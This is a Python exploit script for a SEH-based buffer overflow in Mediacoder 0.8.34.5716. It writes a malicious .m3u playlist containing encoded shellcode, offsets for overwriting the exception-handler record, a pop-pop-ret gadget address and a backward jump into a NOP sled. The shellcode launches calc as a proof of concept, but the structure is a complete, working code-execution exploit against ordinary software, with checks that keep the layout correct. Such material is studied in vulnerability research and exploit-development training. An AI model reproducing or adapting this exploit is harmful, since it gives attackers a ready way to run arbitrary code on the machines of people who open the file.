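#!/usr/bin/python
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
# Date: 05/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at ]yahoo [dot] com
# Version: 0.8.34.5716
# Tested on: Windows XP SP3
# Vendor: http://www.mediacoderhq.com/
# Software link: http://www.mediacoderhq.com/getfile.htm?site=mediacoder.info&file=MediaCoder-0.8.34.5716.exe
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
# Notes: Due to insufficient space after taking control of the EIP, you have to jump backwards and also
#        avoid a few bad bytes after the "A"s.
#
# Layout of exploit.m3u (offsets are from the start of the file):
#     0  "http://"                  7 bytes
#     7  0x41 * 256                 filler; the decoder stub also unpacks into this area
#   263  0x90 * 24                  NOP sled, the backward jump lands in here
#   287  shellcode                  223 bytes, shikata_ga_nai, bad chars \x00\x0a\x0d\x20 excluded
#   510  0x42 * 350                 filler up to the SEH record
#   860  nSEH  "\xEB\x06\x90\x90"   jmp short +6, skips the SEH field and the two NOPs
#   864  SEH   0x660104ee           pop edi # pop ebp # ret in libiconv-2.dll
#   868  "\xE9" + rel32(-603)       jmp back into the NOP sled (lands at offset 270)
#   873  "D" * 55                   trailing junk
#
# nSEH is therefore 853 bytes past the "http://" prefix (BUFFERSIZE).
#
# The payload is assembled as bytes and written in binary mode: text mode would
# translate 0x0a on Windows and, under Python 3, UTF-8-encode every byte >= 0x80,
# which silently breaks the SEH record and the encoded shellcode.

import struct

# Offset of the nSEH record measured from just after the "http://" prefix.
BUFFERSIZE = 853

# Bytes the encoder was told to avoid (msfencode -b below). The note above only
# requires this after the "A"s; the whole file is checked to be conservative.
BAD_CHARS = b"\x00\x0a\x0d\x20"

PREFIX = b"http://"
NOP = b"\x90"

# msfpayload windows/exec CMD=calc R|msfencode -b "\x00\x0a\x0d\x20" -t c -e x86/shikata_ga_nai
# [*] x86/shikata_ga_nai succeeded with size 223 (iteration=1)
SHELLCODE = (
    b"\xdd\xc1\xbd\xc4\x15\xfd\x3a\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
    b"\x32\x31\x6f\x17\x03\x6f\x17\x83\x2b\xe9\x1f\xcf\x4f\xfa\x69"
    b"\x30\xaf\xfb\x09\xb8\x4a\xca\x1b\xde\x1f\x7f\xac\x94\x4d\x8c"
    b"\x47\xf8\x65\x07\x25\xd5\x8a\xa0\x80\x03\xa5\x31\x25\x8c\x69"
    b"\xf1\x27\x70\x73\x26\x88\x49\xbc\x3b\xc9\x8e\xa0\xb4\x9b\x47"
    b"\xaf\x67\x0c\xe3\xed\xbb\x2d\x23\x7a\x83\x55\x46\xbc\x70\xec"
    b"\x49\xec\x29\x7b\x01\x14\x41\x23\xb2\x25\x86\x37\x8e\x6c\xa3"
    b"\x8c\x64\x6f\x65\xdd\x85\x5e\x49\xb2\xbb\x6f\x44\xca\xfc\x57"
    b"\xb7\xb9\xf6\xa4\x4a\xba\xcc\xd7\x90\x4f\xd1\x7f\x52\xf7\x31"
    b"\x7e\xb7\x6e\xb1\x8c\x7c\xe4\x9d\x90\x83\x29\x96\xac\x08\xcc"
    b"\x79\x25\x4a\xeb\x5d\x6e\x08\x92\xc4\xca\xff\xab\x17\xb2\xa0"
    b"\x09\x53\x50\xb4\x28\x3e\x3e\x4b\xb8\x44\x07\x4b\xc2\x46\x27"
    b"\x24\xf3\xcd\xa8\x33\x0c\x04\x8d\xcc\x46\x05\xa7\x44\x0f\xdf"
    b"\xfa\x08\xb0\x35\x38\x35\x33\xbc\xc0\xc2\x2b\xb5\xc5\x8f\xeb"
    b"\x25\xb7\x80\x99\x49\x64\xa0\x8b\x29\xeb\x32\x57\xae"
)

# nSEH: jmp short +6 (EB 06), two NOPs as padding. The short jump is taken
# relative to the byte after the 2-byte instruction, so +6 lands exactly after
# the 4-byte SEH field, i.e. on JMP_BACK.
NSEH = b"\xEB\x06\x90\x90"

# 0x660104ee : pop edi # pop ebp # ret | [libiconv-2.dll]
# NOTE(review): the script gives no reason for this module; presumably it is
# neither SafeSEH- nor ASLR-enabled on the tested build -- confirm before reuse.
SEH = b"\xee\x04\x01\x66"

# Jump back 603 bytes due to insufficient space for shellcode after the SEH
# record. E9 takes a signed 32-bit displacement relative to the byte after the
# 5-byte instruction; packing it instead of hard-coding "\xA5\xfd\xff\xff"
# keeps the byte order right if the distance is ever changed.
JMP_BACK_DISP = -603
JMP_BACK = b"\xe9" + struct.pack("<i", JMP_BACK_DISP)

TRAILER = b"D" * 55

OUTFILE = "exploit.m3u"


def build_payload():
    """Return the full .m3u contents as bytes, verifying the layout still lines up.

    The checks only guard against someone editing one constant and not the
    others; with the values above they all pass.

    Returns:
        bytes: prefix + filler + NOP sled + shellcode + filler + nSEH + SEH +
        backward jump + trailer, 928 bytes in total.

    Raises:
        ValueError: if nSEH is not BUFFERSIZE bytes past the prefix, the nSEH
            short jump does not land on the backward jump, the backward jump
            does not land inside the NOP sled, or a bad char is present.
    """
    filler = b"\x41" * 256   # space for shellcode to decode
    sled = NOP * 24
    body = PREFIX + filler + sled + SHELLCODE + b"\x42" * 350

    # nSEH has to overwrite the SEH record exactly; one byte off and the
    # handler pointer is misaligned.
    if len(body) != len(PREFIX) + BUFFERSIZE:
        raise ValueError(
            "nSEH would be at offset %d past the prefix, expected %d"
            % (len(body) - len(PREFIX), BUFFERSIZE)
        )

    # The short jump in nSEH must skip the SEH field: target = nseh + 2 + disp.
    short_disp = struct.unpack("<b", NSEH[1:2])[0]
    if 2 + short_disp != len(NSEH) + len(SEH):
        raise ValueError("nSEH short jump does not land on the backward jump")

    payload = body + NSEH + SEH + JMP_BACK + TRAILER

    # EIP after the 5-byte E9 is the offset right after it; the displacement
    # is added to that. The target must fall inside the NOP sled.
    landing = len(body) + len(NSEH) + len(SEH) + len(JMP_BACK) + JMP_BACK_DISP
    sled_start = len(PREFIX) + len(filler)
    if not sled_start <= landing < sled_start + len(sled):
        raise ValueError(
            "backward jump lands at offset %d, NOP sled is %d..%d"
            % (landing, sled_start, sled_start + len(sled) - 1)
        )

    # bytearray iteration yields ints on both Python 2 and 3.
    for bad in bytearray(BAD_CHARS):
        if bad in bytearray(payload):
            raise ValueError("payload contains bad char 0x%02x" % bad)

    return payload


def main():
    """Write the payload to OUTFILE in the current directory."""
    payload = build_payload()
    # Binary mode: no newline translation, no text-encoding of bytes >= 0x80.
    with open(OUTFILE, "wb") as f:
        f.write(payload)


if __name__ == "__main__":
    main()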